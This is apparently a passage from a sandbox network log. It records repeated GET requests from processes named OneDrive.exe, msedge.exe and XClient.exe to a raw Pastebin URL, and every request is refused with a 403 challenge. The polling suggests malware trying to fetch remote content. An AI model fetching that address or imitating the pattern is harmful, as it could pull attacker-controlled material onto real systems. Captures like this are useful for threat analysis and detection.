Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: Ln2dE8U+9SpsWZTSoNmrIaRM37mn7tTunR0H1sKQRbNXHtT4rEloYpG/auBU0aflZfaVEk9U139LJrpXoDftLKyTIpwy2x5v6yl/q+bBtfU=$yZP2SZ+953d7piJCFUuMHQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453e4e9a2edf3-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: fMtgDnXrbXVELTuTUNDU8Ak0HLpwXWbI2Rjz7YM+S5BfJL5HuaqznH5x63lg8FSuC2k0D1Ttathk0/YwQbUAUQNOmuOC4z1xVK8MgXy4PGs=$X1udCSpjGnyDGhY1e7kv0g==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453e72f846542-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: tV6+46LaMYkertM4rMOFYzEFIrFesux74VgkIMoDlfqPMSiMUzRLFwsxGrzZPIq4tZZ5v6WAkGZmThfntwlYZ5I0QBAZmlLIjlfdx2xkah0=$kDOadcJ40GZ9U11QXkI+yw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453e9ec4cef56-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: ZgF2O/81GjI6lQkYETpW8HSG9vH04Y7Fkrcwuc/EqRkbqx0Qq+Z9+8dCBI0IxM9jD1JxUNIgWB0zZm1yHUTld4ayIvXEizxs4oj8RoKSXw8=$mzA1+ktbXM+ujlL4U0ebDA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453f83bdbed03-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7328
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: QsE2F3up8wXepjcPCXerQxbsBcGc8iQdvF8bq4BqJLbdECWOTdl1q0e/lWjneHkYHPBSVx5XpSlbrWCR5+L7Ls02uXxCkNAf3/HrkJ9+6ig=$/mJmcqdJLWkWIVTdX8RdOA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453fa9c997743-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: pECa+LDwTBgw5tfatdSIPemrEEK11vFvghW6SxZRDN9BxUDXKt17y6+qKtSBeqWWfm9rhcOIJU9WtPnyu5t49c3RIx9c8Pv+kExJyYhWSiY=$ujEH6n/UvrNNEhu0jgjbdg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453fd596a63e9-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7328
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: ysZc5/SL18uGOoEgL/gpl0JFlalvvebUWbqHC5P7cwjmhsurBczz0CP85qoJ+q8u5vuPNdeqEIluGj2Bl9ArtQ9hUnulplQp+iGRt3quBQc=$pOfaRJhymBn8q5fBtTGDjQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004540b9f7f7797-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: EDwGHhL+feonGRz111xxTK33qzCoJ4RdMoarHbw/02xb1iU6PVtpKnszUatgaH2MyqOJb6MtXK31Rx6yToV2/BjiVEFY3eyFAZb3JQK936o=$mOEb7Nmu0W4EtG/TPKntzA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004540dec9def3b-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: nyZCdoqc/msPt3o/a7pRollqsCkw6rSigB8+pGfOyjytbheueajaigYSCoVQsBuIYDUXZhB4Jywvv9Rtuup/9xHN9xWqc2Vq0I/yzNx0myI=$xUk9MBIFwNWW7UYrShnqtg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045410ca4676fb-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 5/XxHI8lGIUK6WHfbodAy6nckDi9H6rij0z/vyrpzt3E+/LLumChnksK0VT/eS2dLAUSfBTRhrsQltEifNZ8jJeihEzNVbscBNo2+6ElSYY=$lgCkAtpalmK8viXqOa2ovw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004541eec0e6546-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: Ao2HGuPGbKKd/xQeWuwpsVgHh0Q1d2Y3c64/yVqvgKwrqhB1A+gS6gK+3pinF6/42HwWxisLPkSKQ6ipvTMuSxUbXf62FMQITPRiBF6jAFs=$3i/NFOo8Cj9hnKKwTNTR3g==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454214adb770b-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: CPOrGOK/LUmjE75aUuKVkyZ3w/Z5KtpqeHnrzwHnbyggm+IuhspMb5wBm+Ig4rr4TW2BJC7Bb6AbapLT3TObQXiPdhmhS9+AmGO1VqGd7sw=$yuKjGBqAcZNLkaJFlyMWmw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454243a916415-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 5GV5B3KOn59eIik0gpIBznf9q5+kA9B8op/y+CLY7bk9a/VMJGl0++o1OqB6NjD99mVipJy4yle33uI8F+iQIz9xKqtUbkTa7Hth66S85uE=$rI2mKQKdGfwB2zW1eFJrBw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454325efe9493-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: j1zY0oumfZUG2TUdGbg1pHSSk+oCu+S68kvfYRp3gv8KCEpiFUjP5dBpkccC+oXKiK883bD2fb28hZwkRZqAOdyuFV3QDgZKU7s4kjOdRDM=$2cenu0v9AaBKLmMe0BBQuw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045434aa0deef6-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
